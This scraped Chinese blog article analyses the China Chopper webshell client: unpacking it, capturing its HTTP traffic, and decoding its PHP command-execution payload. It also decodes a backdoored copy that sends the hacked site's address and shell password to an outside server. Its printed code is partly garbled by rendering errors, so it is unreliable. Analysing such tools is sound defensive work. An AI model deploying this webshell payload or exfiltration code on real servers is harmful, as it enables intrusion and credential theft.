必威体育Betway必威体育官网
当前位置:首页 > IT技术

全面分析中国菜刀及隐藏后门

时间:2019-07-30 23:12:15来源:IT技术作者:seo实验室小编阅读:78次「手机版」
 

中国菜刀

0x01:“静态”分析中国菜刀

作为一款黑客神器,怎么可能裸奔呢?

我们通过peid等工具可以看出来加壳了

在这里插入图片描述

通过winehx,也可以看到菜刀经过upx加壳处理

在这里插入图片描述

我们相应地对它脱壳处理

在这里插入图片描述

这时候再用peid查看,可以看到已经没有壳了,并且可以看出是vc++6.0编写

在这里插入图片描述

既然已经脱壳了,那我们来把它的可见字符串打印出来看看

在这里插入图片描述

由于字符串太多,我们可以有目的性地查找字符串如http

在这里插入图片描述

再比如说关键字chopper在这里插入图片描述

0x2动态分析中国菜刀

写一个php一句话放在我们网站的根目录下,如1.php,内容

<"https://img-blog.csdnimg.cn/20190114133813928.png" alt="在这里插入图片描述">在这里插入图片描述

监听到的数据包如下:

在这里插入图片描述

客户端在80端口上,以HTTP POST方式通讯

我们可以追踪tcp流来查看整个tcp数据交互过程

在这里插入图片描述

上面红色部分为攻击机POST提交控制命令的内容,下面蓝色部分为靶机返回结果

我们可以看到一共有z0,z1,z2三个参数,我们分别解码。

解码的顺序依次为url解码,然后再base64解码,得到明文:

可以看到红色部分的代码经过base64以及url的编码,我们解码看看

考虑到环境没有联网,我们可以使用butp的解码模块

在这里插入图片描述

在这里插入图片描述

明文如下:

z0=@ini_set(“display_ERRORs”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;p=base64decode(p=base64_decode(p=base64d​ecode(_POST[“z1”]);s=base64decode(s=base64_decode(s=base64d​ecode(_POST[“z2”]);d=dirname(d=dirname(d=dirname(_SERVER[“SCRIPT_FILENAME”]);c=substr(c=substr(c=substr(d,0,1)=="/"?"-c '{KaTeX parse error: expected 'EOF', got '}' at position 2: s}̲'":"/c {s}";KaTeX parse error: Expected '}', got 'EOF' at end of input: r="{p} {KaTeX parse error: Expected 'EOF', got '}' at position 2: c}̲";@system(r." 2>&1");;echo("|<-");die();

z1=cmd

z2=cd /d “D:\phpstudy\PHPTutorial\WWW”&whoami&echo [S]&cd&echo [E]

z1的值是cmd,z2的值是cd /d “c:\inetpub\wwwroot\”&whoami&echo [S]&cd&echo [E]。该操作的意思就是执行输入的cmd命令,列出当前用户与当前目录,执行结果如下所示

在这里插入图片描述

我们输入其他的命令的话,当然也是可以通过同样的流程进行分析

以上就是中国菜刀的流量通信的特征

了解了正常的菜刀是如何工作的,接下来我们看看被植入恶意后门的菜刀是怎样的。

0x03分析中国菜刀后门为了与前一个菜刀的分析流程进行区分,我们这一步特地选用了另外一个菜刀,使用另外一个抓包软件进行分析。

我们这次使用的抓包软件为WSockExpert

打开后我们点击左上角的文件夹图标,选择caidao.exe,点击open即可

在这里插入图片描述

接下来连接菜刀

在这里插入图片描述

在这里插入图片描述

菜刀连接以后我们可以随意操作一下(比如点击、切换文件夹等,以此来产生通信流量方便我们后续的分析)

在这里插入图片描述

回到我们的winsock expert

在这里插入图片描述

我们将下面的字符串解码

先URL解码

在这里插入图片描述

再base64解码

在这里插入图片描述

我们知道,在分析前一个菜刀时,一次URL解码,一次base64解码就可以了,但是,在分析这个菜刀的时候我们注意到,还是存在密文。

那么我们接着解码

在这里插入图片描述

明文是这样的:

if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …hack.php?Url='._SERVER[‘HTTP_HOST’].KaTeX parse error: Expected 'EOF', got '&' at position 25: …request_URI'].'&̲Pass='.key(_POST));}

这里的http://www.7jyewu.cn/hack.php就是这个菜刀的后门地址。

HTTP_HOST就是我们拿到shell的网站,REQUEST_URI就是shell的URI,Pass就是我们菜刀连接一句话时的密码

这段代码的大概意思就是,会将我们的拿到shell的网站的地址,密码等都会通过后门传送给这个网站的所有者。

这样,我们就分析出了这个菜刀是存在后门的。

相关阅读

技术架构分析:攻克Dota2的OpenAI-Five

来源:CreateAMind

推荐一款niubility的网站技术分析插件

Wappalyzer是一款功能强大的、且非常实用的网站技术分析插件,通过该插件能够分析目标网站所采用的平台构架、网站环境、服务器配置

“数字中国”迈向3.0时代 ——访工信部信息中心李德文

“所谓‘数字中

博弈论问题,弱弱的分析

由于上次某人出的,应该说是借鉴的一道博弈论的题目,,感觉到自己的完全空白,,所以这次去网上看了好几篇文章,写下自己的心得体会我看到网

支付风控系统设计:支付风控场景分析(一)

风控是一个让人爱恨交加的话题。 对支付来说风控是必不可少的功能。这个系列的文章将试图从这两个领域简单梳理下支付风控面临的

分享到:

栏目导航

推荐阅读

热门阅读